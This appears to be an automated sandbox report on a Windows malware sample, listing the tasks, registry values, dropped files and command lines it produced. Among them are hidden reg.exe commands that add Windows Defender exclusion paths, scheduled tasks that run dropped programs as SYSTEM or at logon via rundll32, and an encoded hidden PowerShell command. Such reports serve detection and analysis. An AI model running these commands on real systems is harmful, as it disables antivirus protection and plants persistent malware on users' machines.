Technical Information
- %WINDIR%\tasks\brgxlshycwforrjkxv.job
- <SYSTEM32>\tasks\brgxlshycwforrjkxv
- <SYSTEM32>\tasks\gydbvtuqg
- %WINDIR%\tasks\kzwsmuewgdzrfaszo.job
- <SYSTEM32>\tasks\kzwsmuewgdzrfaszo
- %WINDIR%\tasks\jmujdbobhzvnipm.job
- <SYSTEM32>\tasks\jmujdbobhzvnipm
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IurIGwYQKxDU2' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oLvlbWUyU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oLvlbWUyU' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oLvlbWUyU' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oLvlbWUyU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vRwBAIuygvvyC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vRwBAIuygvvyC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\ZXTvwecCZUYWKEVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\ZXTvwecCZUYWKEVB' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\ZXTvwecCZUYWKEVB' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\ZXTvwecCZUYWKEVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\sPwuVezNkSqeTnuRg' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\sPwuVezNkSqeTnuRg' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vRwBAIuygvvyC' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vRwBAIuygvvyC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bXfwGKWfKZUn' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bXfwGKWfKZUn' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oLvlbWUyU' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vRwBAIuygvvyC' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\ZXTvwecCZUYWKEVB' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\sPwuVezNkSqeTnuRg' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\snbxnEXCbHoBfzMo' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\snbxnEXCbHoBfzMo' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bXfwGKWfKZUn' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\snbxnEXCbHoBfzMo' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\snbxnEXCbHoBfzMo' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IurIGwYQKxDU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IurIGwYQKxDU2' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IurIGwYQKxDU2' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IurIGwYQKxDU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bXfwGKWfKZUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bXfwGKWfKZUn' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\snbxnEXCbHoBfzMo' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\sPwuVezNkSqeTnuRg' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\sPwuVezNkSqeTnuRg' = '00000000'
- firefox.exe
- %TEMP%\7zs7f39.tmp\simplinst.exe
- %TEMP%\spwuveznksqetnurg\peujdjpkbaxhadp\aguoheb.exe
- %WINDIR%\temp\snbxnexcbhobfzmo\aywbvjoy\jgdxujzslscpmvke.wsf
- %WINDIR%\temp\snbxnexcbhobfzmo\lymedpugzvhiydo\faletmn.exe
- %ProgramFiles(x86)%\olvlbwuyu\yrbtzn.dll
- <SYSTEM32>\tasks\gydbvtuqg
- %WINDIR%\temp\snbxnexcbhobfzmo\aywbvjoy\jgdxujzslscpmvke.wsf
- %WINDIR%\tasks\brgxlshycwforrjkxv.job
- <SYSTEM32>\tasks\brgxlshycwforrjkxv
- %HOMEPATH%\ntuser.pol
- %PROGRAMDATA%\ntuser.pol
- '%TEMP%\7zs7f39.tmp\simplinst.exe' /S /te "HDRD8DDRD6DDRD4ZCRD7FFRD0YFRD4YFRD2VDRD7GDRD4LDRD7SDRD2ADRD3ZFRD8RCRD8SDRD4DDRD3QDRD6MDRD5KDRD2ZFRD1QDRD7MDRD3KDRD9YFRD2TDRD6MDRD9EDRD6NDRD7LDRD4MDRD5ODRD2TDRD9ADRD3YFRD2ADRD5MDRD8VDRD7...
- '%TEMP%\spwuveznksqetnurg\peujdjpkbaxhadp\aguoheb.exe' es /S
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\Temp\snbxnEXCbHoBfzMo\AywBVjoy\jGdXUJZsLsCPmvkE.wsf"
- '%WINDIR%\temp\snbxnexcbhobfzmo\lymedpugzvhiydo\faletmn.exe' ad /S
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%TEMP%\spwuveznksqetnurg\peujdjpkbaxhadp\aguoheb.exe' es /S' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==' (with hidden window)
- '<SYSTEM32>\gpupdate.exe' /force' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\temp\snbxnexcbhobfzmo\lymedpugzvhiydo\faletmn.exe' ad /S' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "bRgxlshYcWfORrJKxv" /SC once /ST 13:15:00 /RU "SYSTEM" /TR "\"%TEMP%\sPwuVezNkSqeTnuRg\peUjdJpKBAXhADP\AGUOHEB.exe\" es /S" /V1 /F
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oLvlbWUyU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vRwBAIuygvvyC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\sPwuVezNkSqeTnuRg" /t REG_DWORD /d 0 /reg:64
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "KZwSMuewGDzrfASZo" /SC once /ST 02:04:51 /RU "SYSTEM" /TR "\"%WINDIR%\Temp\snbxnEXCbHoBfzMo\lyMedpUGzVhIYdO\FalEtmN.exe\" ad /S" /V1 /F
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "KZwSMuewGDzrfASZo"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lzhKnYEWvepdauCUwMR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "gYdbvtuqg"
- '<SYSTEM32>\taskeng.exe' {9C1E3D82-0E71-4B99-B901-C8DCC487DDDC} S-1-5-21-1960123792-2022915161-3775307078-1001:nviuncwke\user:Interactive:[1]
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gYdbvtuqg"
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "bRgxlshYcWfORrJKxv"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\ZXTvwecCZUYWKEVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C copy nul "%WINDIR%\Temp\snbxnEXCbHoBfzMo\AywBVjoy\jGdXUJZsLsCPmvkE.wsf"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\IurIGwYQKxDU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bXfwGKWfKZUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gYdbvtuqg" /SC once /ST 12:43:54 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZ...
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\snbxnEXCbHoBfzMo" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TR "rundll32 \"%ProgramFiles(x86)%\oLvlbWUyU\yrBtZn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jMUjDBOBHzVNIPM" /V1 /F